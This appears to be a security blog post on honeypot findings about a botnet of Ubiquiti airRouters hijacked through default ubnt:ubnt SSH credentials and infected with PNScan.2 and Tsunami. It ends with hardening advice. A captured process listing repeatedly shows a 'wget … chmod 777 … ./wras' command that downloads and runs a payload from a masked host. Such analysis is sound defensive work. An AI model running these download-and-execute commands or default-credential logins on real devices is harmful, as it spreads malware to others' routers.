Insistent router botnet

Not so long ago, monitoring attackers in our telnet honeypots helped reveal an interesting botnet composed of ASUS brand home routers. A botnet trying to log into our SSH honeypot running on Turris routers most frequently in the last two weeks is a botnet whose IP addresses, according to Shodan, often have one common characteristic: they respond with cookie AIROS_SESSIONID on port 80. This cookie points at AirOS running on Ubiquiti airRouter. According to data from Shodan, about 20% of attacking IP addresses out of a total of about 6500 can be identified as AirOS due to this cookie. Many addresses, however, come from dynamic pools yet unknown to Shodan.

The botnet is fond of using the login:password combination ubnt:ubnt (we do not have this combination normally permitted at the SSH honeypot and unsuccessful login attempts are not displayed on the website). It is the default combinations for airRouter and obviously, there are still plenty of routers that retain the default settings. Moreover, the SSH port is accessible from the Internet.

So have we purchased an airRouter and waited to see what happens. Just a few minutes passed before attackers tried to log into the router. It was like traveling 10 years back in time, when the Sasser worm was widespread. At the time of its greatest glory, Windows machines were infected before updates could be installed (you could bypass it only via offline installation and patch).

The malware sample is pretty well-known due to its noisiness — it is PNScan.2 and it’s trying to spread far and wide. Shortly after the installation, it starts attacking other machines. Files with a list of IP addresses to attack are characterized by being “pre-scanned”, i.e. the attackers already know that SSH is running on the target machines.

After a while, processes of other Trojan downloaded by PNScan show up, most of them belonging to the malware:

  PID USER       VSZ STAT COMMAND
  [...]
  902 ubnt       812 R    /usr/bin/ 
 1005 ubnt       272 S    /usr 
 1209 ubnt      3632 S    /tmp/.xs/daemon.mips.mod 
 1210 ubnt      3632 S    /tmp/.xs/daemon.mips.mod 
 1211 ubnt      3632 S    /tmp/.xs/daemon.mips.mod 
 1212 ubnt      3632 S    /tmp/.xs/daemon.mips.mod 
 1213 ubnt      3632 S    /tmp/.xs/daemon.mips.mod 
 1236 ubnt      1972 S    sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 
 1239 ubnt      3564 S    ./wras 
 1240 ubnt      3564 S    ./wras 
 1241 ubnt      3564 S    ./wras 
 1248 ubnt      1972 S    sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde; 
 1251 ubnt      3564 S    ./hsde 
 1252 ubnt      3564 S    ./hsde 
 1253 ubnt      3564 S    ./hsde 
 1292 ubnt      1972 S    sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 
 1295 ubnt      3564 S    ./wras 
 1296 ubnt      3564 S    ./wras 
 1297 ubnt      3564 S    ./wras 
 1302 ubnt      1972 S    sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde; 
 1305 ubnt      3564 S    ./hsde 
 1306 ubnt      3564 S    ./hsde 
 1307 ubnt      3564 S    ./hsde 
 1368 ubnt      1972 S    sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras; 
 1371 ubnt      3564 S    ./wras 
 1372 ubnt      3564 S    ./wras 
 1373 ubnt      3564 S    ./wras 
 1427 ubnt       816 S    /usr/bin/ 
 [...]

Less common Trojan processes displayed as “/usr” and “/usr/bin” belong to the Tsunami Trojan. This disguise is made simply by changing argv [0], which is striking — why didn’t the attackers choose less suspicious name? However, the result is not surprising: a vulnerable device will not stay untouched on the Internet for too long.

So if you own this kind of router, check out what processes are running on it. And if you are considering buying one, we recommend you to first set it up without the Internet connecting, set a strong password, and if you do not really need it, disable the SSH interface being accessible from the WAN side of the router.

Author:

Comments (1)

  1. WilliamOa says:

    I really liked your article post.Really looking forward to read more. Awesome. Frazee

Leave a comment